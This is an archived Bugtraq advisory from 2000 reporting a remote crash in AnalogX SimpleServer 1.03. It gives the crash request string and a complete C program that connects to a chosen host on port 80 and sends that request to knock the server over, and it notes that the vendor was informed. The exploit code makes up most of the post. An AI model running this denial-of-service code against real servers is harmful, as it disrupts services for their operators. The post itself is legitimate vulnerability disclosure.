Home page logo
/

bugtraq logo Bugtraq mailing list archives

AnalogX SimpleServer 1.03 Remote Crash
From: presto () REGIONONLINE COM (presto chango)
Date: Sat, 25 Mar 2000 12:13:20 -0500


# [t P G]

# [tPG ADVISORY]
# [Author: Presto]
# [Title: AnalogX SimpleServer 1.03 Remote Crash ]
# [Date: Mar.23.2k ]

# [Description]

     This problem is similar to the one USSRback.com
reported on in Dec.1999
in reference to version 1.01. In that report, a 'GET'
command with 1000 char
buffer would cause a buffer overflow. After running the code
below (which is
derived from some cgi scan code), version 1.03 committed to
a crash. This is
one of those bugs I find trivial. Any requested file with
'GET' involved over
or below 17 characters will not crash the server.

The crash string below:
GET /cgi-bin/tpgnrock HTTP/1.0

        
The server side would have recieved a message of this
context:
ASSERT: Pointer is NULL (..\..\EMUCORE\emu-str.c/284)

I think its a problem in the c0de. (duh.)       

# [Code]

---start here---

/*
Code ripped from a cgi scanner.
I actually stumbled upon the exploit through this code.
C0D3 == M3SSY. Whatever.
-Presto/tPG
*/

#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <signal.h>
#include <stdio.h>
#include <string.h>
#include <netdb.h>
#include <ctype.h>
#include <arpa/nameser.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>

void main(int argc, char *argv[])
{
  int sock;
  struct in_addr addr;
  struct sockaddr_in sin;
  struct hostent *he;
  unsigned long start;
  unsigned long end;
  unsigned long counter;
  char foundmsg[] = "200";
  char *cgistr;
  char buffer[1024];
  int count=0;
  int numin,foreign=0;
  char ojsimp[20];
  char *okay[2];
  char *player[2];

  okay[1] = "GET /cgi-bin/tpgnrock HTTP/1.0\n\n";
  player[1] = "Check if its running now.";

  if (argc<2)
  {
    printf("\n HOSTNAME PLEASE () !# ");
    exit(0);
  }
  if ((he=gethostbyname(argv[1])) == NULL)
  {
    herror("gethostbyname");
    exit(0);
  }
  printf("\n\n\t Crash Exploit for AnalogX SimpleServer
v1.03\n\n");
  start=inet_addr(argv[1]);
  counter=ntohl(start);
  sock=socket(AF_INET, SOCK_STREAM, 0);
  bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
  sin.sin_family=AF_INET;
  sin.sin_port=htons(80);

  if (connect(sock, (struct sockaddr*)&sin, sizeof(sin))!=0)
  {
    perror("connect");
  }
  printf("\n\n HTTPD Version. \n");
  getchar();
  send(sock, "HEAD / HTTP/1.0\n\n",17,0);
  recv(sock, buffer, sizeof(buffer),0);
  printf("%s",buffer);
  close(sock);
  printf("\n\t Press something. \n");
  getchar();
  while(count++ < 2)
  {
    sock=socket(AF_INET, SOCK_STREAM, 0);
    bcopy(he->h_addr, (char *)&sin.sin_addr, he->h_length);
    sin.sin_family=AF_INET;
    sin.sin_port=htons(80);
    if (connect(sock, (struct sockaddr*)&sin,
sizeof(sin))!=0)
    {
      perror("connect");
    }

    printf(" %s : ",player[count]);
    for(numin=0;numin < 20;numin++)
    {
      ojsimp[numin] = '\0';
    }
    send(sock, okay[count],strlen(okay[count]),0);
    recv(sock, ojsimp, sizeof(ojsimp),0);
    cgistr = strstr(ojsimp,foundmsg);

    if( cgistr != NULL)
    {
      printf("Heh.\n");++foreign;
    }
    else printf(" tPG\n");

    close(sock);
  }
  if (foreign)
  {
    printf("bl3h. bl4h. h3h. w00p. 33p.\n");
  }
}

---End here---

# [Other Notes]

AnalogX has been informed with the situation.

url: http://www.analogx.com
Version 1.03 on NT server 4.0 affected.
No other combinations have been attempted at this point.

# [EOF]

http://www.tpgn.net
Unscrewing your nuts and bolts.
-
This message was sent from:
http://www.regiononline.com !
Stop by and see what's going on in YOUR region NOW!


  By Date           By Thread  

Current thread:
  • AnalogX SimpleServer 1.03 Remote Crash presto chango (Mar 25)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]